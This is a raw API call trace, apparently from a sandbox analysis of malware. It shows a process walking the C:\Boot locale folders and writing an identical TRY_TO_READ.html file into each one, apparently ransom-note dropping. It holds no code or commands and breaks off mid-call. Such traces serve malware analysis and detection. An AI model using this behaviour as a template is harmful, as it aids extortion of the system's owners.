[0116.424] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.424] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] GetLastError () returned 0x12 [0116.424] SetLastError (dwErrCode=0x12) [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.425] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x343230 [0116.425] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0116.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] GetLastError () returned 0x12 [0116.425] SetLastError (dwErrCode=0x12) [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e080 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0a8 [0116.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.426] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.426] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.426] GetLastError () returned 0x12 [0116.426] SetLastError (dwErrCode=0x12) [0116.426] GetLastError () returned 0x12 [0116.426] SetLastError (dwErrCode=0x12) [0116.426] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.426] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\TRY_TO_READ.html" (normalized: "c:\\boot\\cs-cz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.427] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.427] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.428] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.428] CloseHandle (hObject=0x3d8) returned 1 [0116.428] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.428] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.428] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.428] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0116.428] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0116.428] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0a8 [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0d0 [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.429] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.429] GetLastError () returned 0x0 [0116.429] SetLastError (dwErrCode=0x0) [0116.429] GetLastError () returned 0x0 [0116.429] SetLastError (dwErrCode=0x0) [0116.429] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.429] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\TRY_TO_READ.html" (normalized: "c:\\boot\\da-dk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.429] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.429] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.430] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.430] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.430] CloseHandle (hObject=0x3d8) returned 1 [0116.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.430] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0116.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.430] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.430] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e120 [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.431] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.431] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\TRY_TO_READ.html" (normalized: "c:\\boot\\de-de\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.432] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.432] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.433] CloseHandle (hObject=0x3d8) returned 1 [0116.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0116.433] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0116.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.433] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.433] GetLastError () returned 0x0 [0116.433] SetLastError (dwErrCode=0x0) [0116.433] GetLastError () returned 0x0 [0116.434] SetLastError (dwErrCode=0x0) [0116.434] GetLastError () returned 0x0 [0116.434] SetLastError (dwErrCode=0x0) [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e170 [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.434] GetLastError () returned 0x0 [0116.434] SetLastError (dwErrCode=0x0) [0116.434] GetLastError () returned 0x0 [0116.434] SetLastError (dwErrCode=0x0) [0116.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.434] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\TRY_TO_READ.html" (normalized: "c:\\boot\\el-gr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.434] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.434] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.436] CloseHandle (hObject=0x3d8) returned 1 [0116.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.436] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0116.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1c0 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.437] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\TRY_TO_READ.html" (normalized: "c:\\boot\\en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.437] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.438] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.438] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.439] CloseHandle (hObject=0x3d8) returned 1 [0116.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1e8 | out: hHeap=0x2e0000) returned 1 [0116.439] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0116.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e210 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.440] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.440] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\TRY_TO_READ.html" (normalized: "c:\\boot\\es-es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.440] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.440] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.441] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.441] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.442] CloseHandle (hObject=0x3d8) returned 1 [0116.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: 